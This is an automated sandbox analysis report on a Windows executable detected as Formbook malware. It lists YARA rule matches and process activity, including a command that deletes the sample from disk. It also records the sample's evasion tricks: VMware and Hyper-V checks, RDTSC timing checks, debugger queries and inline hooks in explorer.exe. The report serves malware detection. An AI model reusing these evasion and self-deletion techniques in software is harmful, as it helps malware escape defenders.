Source: 0000000D.00000002.497054579.0000000001840000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: #6495PI-29458-2020.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@1/1

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#6495PI-29458-2020.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3316:120:WilError_01

Source: #6495PI-29458-2020.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: #6495PI-29458-2020.exe

ReversingLabs: Detection: 19%

Source: #6495PI-29458-2020.exe	String found in binary or memory: es>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvail
Source: #6495PI-29458-2020.exe	String found in binary or memory: es>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvail
Source: #6495PI-29458-2020.exe	String found in binary or memory: ble> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle
Source: #6495PI-29458-2020.exe	String found in binary or memory: ble> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle

Source: unknown	Process created: C:\Users\user\Desktop\#6495PI-29458-2020.exe 'C:\Users\user\Desktop\#6495PI-29458-2020.exe'
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process created: C:\Users\user\Desktop\#6495PI-29458-2020.exe {path}
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\#6495PI-29458-2020.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process created: C:\Users\user\Desktop\#6495PI-29458-2020.exe {path}
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\#6495PI-29458-2020.exe'

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: #6495PI-29458-2020.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: #6495PI-29458-2020.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000E.00000000.464626277.000000000DC20000.00000002.00000001.sdmp
Source:	Binary string: netsh.pdb source: #6495PI-29458-2020.exe, 0000000D.00000002.497334221.00000000019D0000.00000040.00000001.sdmp
Source:	Binary string: netsh.pdbGCTL source: #6495PI-29458-2020.exe, 0000000D.00000002.497334221.00000000019D0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: #6495PI-29458-2020.exe, 0000000D.00000002.498156199.0000000001C2F000.00000040.00000001.sdmp, netsh.exe, 00000014.00000002.606306317.000000000382F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: #6495PI-29458-2020.exe, netsh.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000E.00000000.464626277.000000000DC20000.00000002.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: #6495PI-29458-2020.exe, uNotepad/Form1.cs	.Net Code: TGBNJUYHFDERWS System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.#6495PI-29458-2020.exe.520000.0.unpack, uNotepad/Form1.cs	.Net Code: TGBNJUYHFDERWS System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.#6495PI-29458-2020.exe.520000.0.unpack, uNotepad/Form1.cs	.Net Code: TGBNJUYHFDERWS System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.0.#6495PI-29458-2020.exe.ea0000.0.unpack, uNotepad/Form1.cs	.Net Code: TGBNJUYHFDERWS System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.#6495PI-29458-2020.exe.ea0000.1.unpack, uNotepad/Form1.cs	.Net Code: TGBNJUYHFDERWS System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 0_2_04E51440 push ebp; retf
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_00404246 push 4F62DEB6h; retf
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_0041CEF2 push eax; ret
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_0041CEFB push eax; ret
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_0041CEA5 push eax; ret
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_0041CF5C push eax; ret
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_0041CF89 push eax; ret
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B8D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0378D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_03114246 push 4F62DEB6h; retf
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0312D865 push esi; retf
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0312CF5C push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0312CF89 push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0312CEA5 push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0312CEF2 push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 20_2_0312CEFB push eax; ret

Source: initial sample

Static PE information: section name: .text entropy: 7.7536017706

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xEB

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000000.00000002.440393594.0000000002A08000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: #6495PI-29458-2020.exe PID: 5040, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: #6495PI-29458-2020.exe, 00000000.00000002.440393594.0000000002A08000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: #6495PI-29458-2020.exe, 00000000.00000002.440393594.0000000002A08000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 00000000031198E4 second address: 00000000031198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 0000000003119B4E second address: 0000000003119B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe

Code function: 13_2_00409A80 rdtsc

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe TID: 6116

Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\explorer.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe

Thread delayed: delay time: 922337203685477

Source: explorer.exe, 0000000E.00000000.461871253.00000000083EB000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000000E.00000000.461903500.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: #6495PI-29458-2020.exe, 00000000.00000002.440393594.0000000002A08000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: explorer.exe, 0000000E.00000000.457602632.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000000E.00000000.458171699.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: #6495PI-29458-2020.exe, 00000000.00000002.440393594.0000000002A08000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 0000000E.00000000.461871253.00000000083EB000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: #6495PI-29458-2020.exe, 00000000.00000002.440393594.0000000002A08000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: #6495PI-29458-2020.exe, 00000000.00000002.440393594.0000000002A08000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000000E.00000000.458171699.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: #6495PI-29458-2020.exe, 00000000.00000002.440393594.0000000002A08000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 0000000E.00000000.461732395.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: #6495PI-29458-2020.exe, 00000000.00000002.440393594.0000000002A08000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 0000000E.00000000.457602632.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000000E.00000000.457602632.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: #6495PI-29458-2020.exe, 00000000.00000002.440393594.0000000002A08000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: #6495PI-29458-2020.exe, 00000000.00000002.440393594.0000000002A08000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: #6495PI-29458-2020.exe, 00000000.00000002.440393594.0000000002A08000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 0000000E.00000000.461732395.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 0000000E.00000000.461903500.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 0000000E.00000000.457602632.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 0000000E.00000000.443706062.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe

Code function: 13_2_00409A80 rdtsc

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe

Code function: 13_2_0040ACC0 LdrLoadDll,

Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B661A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B661A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B62990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B5C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B3B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B3B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B3B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BC41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B54120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B54120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B54120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B54120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B54120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B39100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B39100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B39100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B3B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B3B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B3C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B5B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B5B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B620A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B790AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B39080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B340E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B340E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B340E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B358EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BCB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BCB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BCB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BCB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BCB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BCB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B4B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B4B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B4B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B4B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BB7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C01074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C04015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01C04015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B50050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B50050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B64BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B64BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B64BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B62397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B6B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BF138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B41B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01B41B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\#6495PI-29458-2020.exe	Code function: 13_2_01BED380 mov ecx, dword ptr fs:[00000030h]
